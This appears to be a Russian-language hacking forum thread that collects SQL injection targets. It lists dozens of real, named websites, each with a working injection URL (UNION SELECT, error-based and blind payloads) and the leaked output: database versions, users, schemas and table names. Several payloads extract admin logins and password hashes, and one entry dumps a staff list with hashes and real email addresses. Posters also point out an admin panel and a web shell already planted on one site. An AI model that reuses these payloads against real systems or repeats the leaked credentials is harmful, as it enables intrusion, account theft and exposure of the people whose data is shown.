kapital_zed_redirect,
kapital_zed_site_menu,
kapital_zed_siteinfo,
kapital_zed_tplblock,
kapital_zed_tplman

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
QUERY_ID,
SEQ,
STATE,
DURATION,
CPU_USER,
CPU_SYSTEM,
CONTEXT_VOLUNTARY,
CONTEXT_INVOLUNTARY,
BLOCK_OPS_IN,
BLOCK_OPS_OUT,
MESSAGES_SENT,
MESSAGES_RECEIVED,
PAGE_FAULTS_MAJOR,
PAGE_FAULTS_MINOR,
SWAPS,
SOURCE_FUNCTION,
SOURCE_FILE,
SO

http://www.carnegie-institute.edu/careerPosting.php?id=-1+union+select+1,version(),3,4,5/*

Database Version: 4.1.25-Debian_mt1
Database name: db8721_content
User name: db8721@64.13.192.36

----------------------------------------------------------------------------------------------------------

http://ecet.spsu.edu/FacultyStaff.php?id=-24+union+select+1,version(),3,4,5,6,7,8,9,10--

Database Version: 5.0.77
Database name: ecet
User name: ecet@localhost

----------------------------------------------------------------------------------------------------------

http://www.bikeweek.org.uk/page.php?id=64'+union+select+1,group_concat(user_i d,0x3a,user_password),3+from+users/*
Look at the source code

Database Version: 4.1.22-community-nt-log
Database name: bikeweek10live
User name: bikeweek10@localhost

Сайт: http://www.infotex.ru
ТИЦ: 80
PR: 4
Примеры запросов: http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,column_name), 3,4,concat_ws(0x0b,version(),user(),database(),@@v ersion_compile_os),6,now(),8,9+from+information_sc hema.columns+where+table_name=0x7573657273--+

http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,login,0x3a,ha sh,0x3a,salt),null,4,group_concat(0x0b,mail),6,now (),8,9+from+users--+
version - 5.1.36-log
user - fotoclub31_mysql@212.193.241.39
database - fotoclub31_computer31
os - portbld-freebsd7.2
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
Product,
Product2,
Product3,
all_Product,
group_name,
group_name_main,
info_for_redact_infotex,
info_for_redact_teny_mce,
menu_left,
new_Product,
news,
news_infotex,
our_news,
tehcentr,
text_in_page,
text_main_in_page,
type_news_infotex,
upd_price,
users,
vendor,
Product,
Product3,
advice,
albom_for_exhibition,
author,
beeline_galery,
beeline_galery_ball_user,
book_biblioteka,
categories,
club_cart_info,
coment_advice,
coment_personal_page,
coment_photo_help,
coment_reportage,
comment_photo,
comment_photo2,
config,
config_db,
discussion_author_photo,
exhibition,
favorite_author_photo,
for_del_photo,
foto_blic_o

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
ENGINE,
SUPPORT,
COMMENT,
TRANSACTIONS,
XA,
SAVEPOINTS,
EVENT_CATALOG,
EVENT_SCHEMA,
EVENT_NAME,
DEFINER,
TIME_ZONE,
EVENT_BODY,
EVENT_DEFINITION,
EVENT_TYPE,
EXECUTE_AT,
INTERVAL_VALUE,
INTERVAL_FIELD,
SQL_MODE,
STARTS,
ENDS,
STATUS,
ON_COMPLETION,
CREATED,
LAST_ALTERED,
LAST_EXECUTED,
EVENT_COMMENT,
ORIGINATOR,
CHARACTER_SET_CLIENT,
COLLATION_CONNECTION,
DATABASE_COLLATION,
FILE_ID,
FILE_NAME,
FILE_TYPE,
TABLESPACE_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAM
========================================
Сайт: http://www.kazanclub.ru
ТИЦ: 20
PR: 0
Примеры запросов: http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),3,4,5,6--+

http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,group_concat(0x0b,column_name),3, 4,5,6+from+information_schema.columns--+
version - 5.1.41-log
user - kazanclu_rukazan@localhost
database - kazanclu_rukazanclub2
os - unknown-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMER

http://www.zaglyani.ru/links/category.php?dir=2&uid=-921+union+select+1,concat_ws(user(),version(),data base()),3,4,5,6,7,8,9,10,11,12+--+

user() - u156963@10.10.153.211
version() - 5.0.67-log
database() - u156963

http://www.carte-bleue.com/page.asp?menu_id=26+OR+1=(SELECT+TOP+1+password+FR OM+tbl_user_admin+where+Login='webadmcb')

(pinch sps)

www.warrenfarrell.com/pages.php?id=29UNION ALL SELECT 1,%String_Col%,3,4,5,6,7--
Host IP: 216.218.227.242
Web Server: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7a DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a
Powered-by: PHP/4.4.0
DB Server: MySQL
Current DB: warren

www.lulworth.nl/pages.php?id=1018UNION ALL SELECT %String_Col%,2,3,4--
Host IP: 89.18.180.54
Web Server: Apache/2
Powered-by: PHP/5.2.5
DB Server: MySQL >=5
Current DB: lulworth_Algemeen

www.warehouse.lv/pages.php?id=companyUNION ALL SELECT %String_Col%,2 and 'x'='x
Host IP: 213.21.225.48
Web Server: Apache
DB Server: MySQL >=4.1
Current DB: warehouse


www.medy.ru/pages.php?id=296UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--
Host IP: 77.221.132.188
Web Server: nginx/0.4.13
Powered-by: PHP/5.2.0-8+etch11
DB Server: MySQL >=5
Current DB: dex


www.lulworth.nl/pages.php?id=1286 UNION ALL SELECT %String_Col%,2,3,4--
Host IP: 89.18.180.54
Web Server: Apache/2
Powered-by: PHP/5.2.5
DB Server: MySQL >=5
Current DB: lulworth_Algemeen


www.nfu.edu.tw/inlet/pages.php?ID=Prospective AND %True_Expression% AND 'x'='x
Host IP: 140.130.1.19
Web Server: Apache/2.2.10 (Unix) PHP/4.4.9
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: RSS23_NFU

www.connexions-berkshire.org.uk/pages.php?id=95UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,%String_Col%,12,13,14--
Host IP: 217.77.176.230
Web Server: Zeus/4.2
Powered-by: PHP/4.4.2
DB Server: MySQL
Current DB: connexions-berkshire


www.marinaautostadium.com/pages.php?id=24 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11--
Host IP: 69.163.245.54
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL >=5
Current DB: rhinossoccer

Шопер какой то..

http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+union+select+concat_ws(0x3a,user(),version(), database())--&a=add

Database Version: 5.0.89-community
Database name: pcrakit_cmscatalog
User name: pcrakit_usercms@localhost

Ракитанчиков там в 3000 -)


http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+UNION+SELECT+CONCAT(0x3a,(SELECT+CONCAT(membe rs_password,0x3a,members_email)+FROM+pcrakit_cmsca talog.cms_members+LIMIT+50,1),0x3a)-- &a=add

http://www.brilliant-info.ru/showinfo.php?id=99999+or%281,1%29=%28select+count% 280%29,concat%28%28select+concat_ws%280x3a,user%28 %29,version%28%29,database%28%29%29+from+informati on_schema.tables+limit+0,1%29,floor%28rand%280%29* 2%29%29from%28information_schema.tables%29group+by +2%29--++
User: u55884@localhost
Version: 5.0.77
Database: brillian_info


http://www.procctv.ru/page.php?id=-1%27+or%281,1%29=%28select+count%280%29,concat%28% 28select+concat_ws%280x3a,user%28%29,database%28%2 9,version%28%29%29+from+information_schema.tables+ limit+0,1%29,floor%28rand%280%29*2%29%29from%28inf ormation_schema.tables%29group+by+2%29--++
User: procctv@localhost
Database: cms
Version: 5.0.45-log

http://www.advokaterne.net/index.php?act=info&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,version%28%29,da tabase%28%29%29+from+information_schema.tables+lim it+0,1%29,floor%28rand%280%29*2%29%29from%28inform ation_schema.tables%29group+by+2%29--++
User: web57_u1@localhost
Version: 5.0.51a-24+lenny3
Database: web57_db1

http://www.bad-endbach.info/index.php?id=1699&lang=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,version%28%29,da tabase%28%29%29+from+information_schema.tables+lim it+0,1%29,floor%28rand%280%29*2%29%29from%28inform ation_schema.tables%29group+by+2%29--++
User: 'dbo242799363@212.227.119.4
Version: 5.0.81-log
Database: db242799363

http://www.belmontburlesque.com/cast.php?id=-2+union+select+1,group_concat%28user_name,0x3a,use r_password%29,3,4,5,6,7+from+administrators--

Pr 3

http://www.lanceburton.org/

http://www.lanceburton.org/cast.php?id=-1+union+all+select+1,2,version(),4,5,6

User: LANCEBURT@APACHE2-ICHIBAN.CONSTANTINE.DREAMHOST.COM
Version: 5.1.39-LOG
Database: LBURTON

http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),3+--

version : 5.0.24-standard
user : troykastal@localhost.localdomain
database : db_troykastal
os : pc-linux-gnu

http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,login,passwo rd),3+from+admin--

http://www.troykastal.ru/administrator/

Эх, надоело с ней возиться

http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,concat_ws%280x3a,user%28%29,databa se%28%29,version%28%29%29,19,20,21,22,23,24,25,26, 27%20+--+&cid=36&rating=3&full

User: turby@localhost
Database: turby
Version: 5.0.32-Debian_7etch5

И всё чо надыбал пока возился:

http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,concat_ws%280x3a,table_schema,TABL E_NAME%29,19,20,21,22,23,24,25,26,27%20from%20info rmation_schema.tables%20--+&cid=36&rating=3&full



turby:account
id
login
password
passMD5
email
icq
homepage
type
date
last_date


turby:jos_g2_User
g2_id
g2_userName
g2_fullName
g2_hashedPassword
g2_email
g2_language
g2_locked


turby:jos_users
id
name
username
email
password
usertype
block
sendEmail
gid
registerDate
lastvisitDate
activation
params


turby:ox_users
user_id
contact_name
email_address
username
password
language
default_account_id
comments
active
sso_user_id
date_created
date_last_login
email_updated



turby:tur_user_list

id
login
password
passMD5
email
icq
homepage
type
reg_date
last_login


Ну и хеши соответственно нельзя ;)

http://www.glosters.org.uk/collectionitem.php?id=1721%20and%2030=3%20union%20 all%20select%201,2,group_concat(id,0x3a,username,0 x3a,password,0x3a,lastseen,0x3a,access,0x3a,email) ,4,5,6,7,8,9,10,11,12,13,14%20from%20staff--


14:dsuk:2c3488fcd05c24c386b9bb0eeaff5ae9:127253192 5:1:,2:glosters:5811ab9d1aebc5f6c3a26a19943f4e94:1 159865689:255:christoryland@aol.com,4:chrisryland: 3e5979f32353bf310b5f9b47aebf5d1a:1271605911:0:chri storyland@aol.com,5:DRead:a596b2bf531f416c9f2b6651 c194149c:1273221516:0:D.Read@sogm.co.uk,6:GStreatf eild:11eabf88a3d7f430bb44fff0e902d3b1:1270652183:0 :george.streatfeild@sogm.co.uk,7:GGordon:ec025b9b5 d6091f07f31440252e38b46:1273047690:0:graham.gordon @sogm.co.uk,8:JHayes:64489efaf33c2d914ca8160251287 507:1272982754:0:Janet.Hayes@sogm.co.uk,9:stephen: bb32cf5500bfcc4100088d3e2b07237b:1271773560:0:Step hen.Oxlade@btinternet.com,15:louise:1bdd0db9a74407 f577a5c92d8ab308dc:1252508387:0:,16:curator:4ca221 2a3086376b245df2620870b63f:1272485207:0:curator@so gm.co.uk

http://www.linorusso.ru/catalog.php?parent_id=36&tov_id=-194+union+select+1,2,3,4,5,6,concat_ws(char(58),@@ version,user(),database(),@@version_compile_os),8, 9,10,11,12,13,14,15,16,17,18,19,20--+

version : 6.0.11-alpha-log первый раз попалась 6 версия
user : tehnodom@localhost
database : linorusso
os : portbld-freebsd7.1

http://www.diabetes.ee/foorum-teema.php?lk=-33681+union+select+1,2,3,4,concat(user(),version() ,database(),@@version_compile_os)--

http://www.megazone.ee/index2.php?id=5&news_id=-3+union+select+1,concat(username,char(32,58,32),pa ssword),3,4+from+cms_admin--

еще кто то тут шелл загрузил ))

http://www.megazone.ee/dev/pic_big.php

http://www.tutpricol.ru/message.php?id=-92+union+select+1,2,3,concat(version(),0x3a,databa se(),0x3a,user()),5--

User: tutpric5_root@localhost
Database: tutpric5_tutpricol
Version: 4.1.25-log

Сайт: http://www.mebek.ru
ТИЦ: 20
PR: 2
Пример запроса: http://www.mebek.ru/index4.php?id=-9+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os)--+
version - 4.1.22
user - mebek01@fix.hc.ru
database - wwwmebekru
os - portbld-freebsd7.0

=========================================

Сайт: http://www.maslov-pr.com
ТИЦ: 70
PR: 3
Пример запроса: http://www.maslov-pr.com/index5.php?a=6&poda=7&id=-3+union+select+1,2,3,unhex(hex(concat_ws(0x0b,vers ion(),user(),database(),@@version_compile_os)))--+
version - 4.1.18
user - maslov01_1@tex.hc.ru
database - wwwmaslovprcom_1
os - unknown-linux-gnu

=========================================

Сайт: http://www.moloko-nsk.ru
ТИЦ: 0
PR: 1
Пример запроса: http://www.moloko-nsk.ru/index4.php?id=-17+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os)--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_moloko
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS, TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
cute_categories,
cute_comments,
cute_flood,
cute_ipban,
cute_news,
cute_story,
cute_users,
categg,
email,
files,
kapital_zed_admin_menu,
kapital_zed_articles,
kapital_zed_brotator,
kapital_zed_category,
kapital_zed_form,
kapital_zed_news,
kapital_zed_pages,
kapital_zed_redirect,
kapital_zed_site_menu,
kapital_zed_siteinfo,
kapital_zed_tplblock,
kapital_zed_tplmanager,
kapital_zed_users,
tovari,
zed_news,
zed_news2,
cute_categories,
cute_comments,
cute_flood,
cute_ipban,
cute_news,
cute_story,
cute_users,
files,
kapital_zed_admin_menu,
kapital_zed_articles,
kapital_zed_brotator,
kapital_zed_category,
kapital_zed_form,
kapital_zed_news,
kapital_zed_pages,
kapital_zed_redirect,
kapital_zed_site_menu,
kapital_zed_siteinfo,
kapital_zed_tplblock,
kapital_zed_tplman
=========================================

Сайт: http://ratukencana.com
ТИЦ: 0
PR: 0
Примеры запросов: http://ratukencana.com/index4.php?id=1&idc=15&idp=-14+union+select+concat_ws(0x0b,version(),user(),da tabase(),@@version_compile_os),2,3--+

http://ratukencana.com/index4.php?id=1&idc=15&idp=-14+union+select+group_concat(0x0b,nm_user,0x3a,pwd _user),2,3+from+sys_users--+
version - 5.0.51a-24+lenny3
user - t54052_root@localhost
database - t54052_ratukencana
os - debian-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
master_item,
menu_item,
menu_page,
rel_brand_category,
sys_users,
tb_brand,
tb_categor

http://www.effedieffe.com/interventizeta.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20--
Database: effedieffe_old
Version: 5.0.77-log
User: fdfdbuser@localhost
PR: 6

сначала думал - боян, т.к. скуль с этого сайта уже была. но там совсем другая bd.
если неправ, удалите.

http://www.interarmees.fr/article.php?article=-1020+union+all+select%201,2,3,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,5,6,7,8--

5.0.51a-24+lenny3:interarmees_web:interarmees@gcc-www

http://www.teamarena.ru/user_gallery/10556+union+select+1,2,concat(version(),user(),dat abase()),4,5,6,7

http://www.koliz.nnov.ru/catalog/?action=printprod&prod_id=-109%20union%20select%201,concat%28version%28%29,0x 7e,user%28%29,0x7e,database%28%29,0x7e,@@version_c ompile_os%29%20--
5.0.87-log~koliz@localhost~koliz~portbld-freebsd6.4 - version,user,database,os

http://www.alkom.nnov.ru/catalog/?prod_id=-109%20union%20select%201,concat_ws%280x3a,version% 28%29,user%28%29,database%28%29,@@version_compile_ os%29%20--
5.0.87-log : alkom@localhost : alkom : portbld-freebsd6.4

http://users.kharkiv.com/orgtech/index.php?page=show_tovar&tovar_id=-16%20union%20select%201,2,3,4,5,6,7,8,concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29,@@ver sion_compile_os%29,10,11,12,13--

4.0.27 : orgtech@localhost : orgtech : portbld-freebsd5.4

www.autogazette.de/printable.php?id=-2000757 union select 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database() ,version()),6--

quakerbridgemall.com PR-5

http://www.quakerbridgemall.com/offers.php?id=39+union+all+select+1,concat_ws%280x 3a,version%28%29,user%28%29,database%28%29%29,3,4, 5,6,7,8,9,0+--+

5.0.27:quakerdb2user@localhost:QuakerDB2

Сайт - http://www.animationtrip.com
ТИЦ: 10
PR: 4
Пример запроса: http://www.animationtrip.com/item.php?id=-257+union+select+1,2,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),4--+
version - 4.1.22-standard-log
user - animationtrip@localhost
database - animationtrip
os - pc-linux-gnu

===========================================

Сайт: http://www.paer.ru
ТИЦ: 130
PR: 3
Пример запроса: http://www.paer.ru/info/item.php?id=11+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.0.75-log
user - srv19733_root@c27-w.ht-systems.ru
database - srv19733_db1
os - portbld-freebsd7.0

===========================================

Сайт: http://plusiminus.com
ТИЦ: 170
PR: 4
Пример запроса: http://plusiminus.com/item.php?id=412+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(m id(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.1.41-log
user - m35978@fhe11.hoster.ru
database - db35978m
os - portbld-freebsd8.0

===========================================

Сайт: http://www.purepeopleproducts.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.purepeopleproducts.com/index5.php?id=-12+union+select+concat_ws(0x0b,version(),user(),da tabase(),@@version_compile_os)--+
version - 5.0.51a-3ubuntu5.5-log
user - CN20070091@localhost
database - CN20070091_ppp
os - debian-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
_mailtemplates,
_metavars,
adres,
artikel,
artikel_rubriek,
artikel_verpakking,
artikelomschr,
betaalwijze,
boxtype,
branche,
collectie,
collectie_omschr,
collectie_slides,
contactpersoon,
country,
custstatus,
dessin,
factuur,
form,
functie,
gebruikers,
gebruikersrol,
hangtag,
hscode,
info_slides,
infoitem,
interface_wrds,
klant,
klant_contact,
klant_item,
klant_item_status,
klant_item_type,
klant_resp,
kleur,
land,
levering,
levertijd,
maat,
mailing,
materiaal,
menu_slides,
menuitem,
orderopmerking,
packingperpcs,
ppplabel,
producent,
producent_collectie,
producent_contact,
productieorderregel,
productieorders,
productieorderstatus,
productietijd,
profiel,
rubriek,
sidelabel,
silverlogo,
slides,
temp,
transport,
transporteur,
verkooporder,
verkooporderregel,

https://www.infoslice.com/?cmd=del&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28s elect+concat_ws%280x3a,user%28%29,database%28%29,v ersion%28%29%29+from+information_schema.tables+lim it+0,1%29,floor%28rand%280%29*2%29%29from%28inform ation_schema.tables%29group+by+2%29--++
User: infoslice@localhost
Database: infoslice
Version: 5.1.44

http://www.knowledgeforaction.info/articoloPrt.php?id=-1+union+select+concat_ws%280x3a,user%28%29,databas e%28%29,version%28%29%29,2,3/*
User: de kfainfo_db@64.202.163.81
Database: kfainfo_db
Version: 4.0.27-max-log

Сайт: http://tractor.ru
ТИЦ: 2000
PR: 5
Пример запроса: http://tractor.ru/partners/index5.php?id=-11767+union+select+1,db_name(),@@version,system_us er,user,6,7,8,9,10,11,12,13--+
version - Microsoft SQL Server 2005 - 9.00.4053.00 (X64) May 26 2009 14:13:01 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

system user - specserver-2
user - dbo
database - specserver-2

===========================================

Сайт: http://www.bxllaique.be
ТИЦ: 0
PR: 5
Пример запроса: http://www.bxllaique.be/index5.php?m1=0&m2=2&id=52&g=2+or+(select+count(*)+from+(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid(unhex(hex (@@version_compile_os)),+1,+63),+floor(rand(0)*2)) )--+
version - 4.1.9-standard-log
user - bxllaique@localhost
database - bxllaique
os - pc-linux-gnu

===========================================

Сайт: http://www.capstonetea.com
ТИЦ: 0
PR: 3
Пример запроса: http://www.capstonetea.com/index4.php?ID=11+or+(select+count(*)+from+(select+ 1+union+select+2+union+select+3)x+group+by+concat( mid(version(),+1,+63),+floor(rand(0)*2)))
version - 4.1.22-standard
user - capstone_capston@localhost
database - capstone_CapstoneWeb
os - pc-linux-gnu

Пара немчиков

http://www.neusserkarneval.de/presse/show.php?id=-1+union+select+1,database(),version(),4,5,6,7,8,us er(),10,11,12,13,14%20--Database: db215839
Version: 4.1.22-standard-log
User: db215839@local2

http://www.art-in.de/incmeldung.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8%20--Database: db1082979-artintv
Version: 5.0.32-Debian_7etch11-log
User: dbu1082979@localhost
PR: 4
ТИЦ: 20

================================================== ===================
Любителям металла

http://www.avantgarde-metal.com/content/stories2.php?id=-86%27%20union%20select%201%2C%202%2C%20concat_ws(0 x3a,database(),version(),user())%2C%204%2C%205%2C% 205%23%20AND%20%271%27=%271Database: d0052127
Version: 4.1.22-max-log
User: d0052127@localhost
PR: 3

http://suriyanto.net/rock/rockmusic.php?id=3337'+union+select+1,2,3,4,5,6,7, 8%23+AND+%271%27=%271Database: suriyant_muziek
Version: 5.0.81-community
User: suriyant_yanto@localhost
PR: 3

================================================== ===================

http://www.brushesdownload.com/tfile.asp?id=-1250'+union+select+1,concat_ws(0x3a,database(),ver sion(),user()),3,4,5,6,7'
Databese: dbbrushesdownload
Version: 5.1.45-community
User: brushesd@C24327-34937
PR: 4

http://www.carbodydesign.com/video/?id=-2990+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,database(),version(),user()),11,12,13,14,15,16,17 ,18,19,20,21%20--
Database: carbodyd_db
Version: 5.0.90-community
User: carbodyd_dbuser@localhost
PR: 3
ТИЦ: 80

www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--

fruitharvesting.com/productinfo.php?id=52UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x

www.brill.se/productInfo.php?id=111UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23--

www.atmtravel.com.au/productinfo.php?id=-123 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19--

www.hypetrading.com/productinfo.php?id=285UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9--

www.jemesp.com/productInfo.php?id=4UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--

www.wedding-cake-toppers.com.au/productinfo.php?ID=15 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--

www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression% AND 'x'='x

www.jemesp.com/productInfo.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--

www.theshopnyny.com/productinfo.php?id=928UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20--

www.gmscsolution.com/productinfo.php?id=384 UNION ALL SELECT 1,%String_Col%,3,4,5--

www.fullcirclefurnishings.com/productinfo.php?id=213 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x

www.bugnbots.com/productinfo.php?ID=6 UNION ALL SELECT %String_Col%,2,3,4--

www.luckinthebox.com/productinfo.php?id=262 AND %True_Expression%

www.kingsleysestates-furnishings.co.uk/productinfo.php?id=411 AND %True_Expression% AND 'x'='x

www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression%

superwholesales.com.au/productinfo.php?id=10 AND %True_Expression%

marqueeequity.com/productinfo.php?id=9 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--

www.idoweddingfavours.com.au/productinfo.php?ID=406 UNION ALL SELECT %String_Col%,2,3,4,5,6,7--

fruitharvesting.com/productinfo.php?id=49 UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x

www.blackkatzfurnishings.com/productinfo.php?id=499 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x

fullcirclefurnishings.com/productinfo.php?id=367 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x

http://response.restoration.noaa.gov/faq_topic.php?faq_topic_id=-1+union+select+1,2,concat(user(),char(58),version( ),char(58),database(),char(58),@@version_compile_o s),4,5,6,7,8,9,10+from+users--

